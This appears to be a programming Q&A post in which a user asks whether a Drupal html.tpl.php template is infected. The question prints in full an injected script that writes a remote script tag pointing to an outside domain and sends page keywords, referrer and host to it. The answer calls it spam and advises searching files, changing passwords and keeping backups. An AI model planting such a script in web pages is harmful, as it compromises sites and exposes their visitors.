David Smith David Smith - 10 months ago 68
PHP Question

PHP malware inside this apparently clean file?

I have a

file (
) inside a module for
, with the following code:

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php print $language->language; ?>" version="XHTML+RDFa 1.0" dir="<?php print $language->dir; ?>"<?php print $rdf_namespaces; ?>>

<head profile="<?php print $grddl_profile; ?>">
<?php print $head; ?>
<title><?php print $head_title; ?></title>
<?php print $styles; ?>
<?php print $scripts; ?>

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://atelier24-gerd-kallhardt.de/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://atelier24-gerd-kallhardt.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
<body class="<?php print $classes; ?>" <?php print $attributes;?>>
<div id="skip-link">
<a href="#main-content" class="element-invisible element-focusable"><?php print t('Skip to main content'); ?></a>
<?php print $page_top; ?>
<?php print $page; ?>
<?php print $page_bottom; ?>

My problem is that some antiviruses flag it as a malware.

Please, check this virustotal report.

Could be this flag maybe because the
inclusion of:


The file
lives on:
(Drupal website).

You can download this file from here.

Then I have some questions:

  • Is this a legitimate file (despite a possible infection)?

  • It was infected?

  • Is there good and bad (malware) code?

  • How can I remove the bad part?, just by deleting that line of code, with:

  • How this code could got attached there?

Answer Source

That happened to me too. Some malware is searching for HTML opening file in dir structure I guess and found this one first. Luckily, the one that was really used, from my theme wasn't infected.

Search for that "atelier" text in all your files or some other string that came with this malware.

It's not specially bad, but just spammer.

Change all back-end admin and (S)FTP passwords and do backups on regular bases.

If you are on shared host..hmm...may be that some other website was hacked, not yours.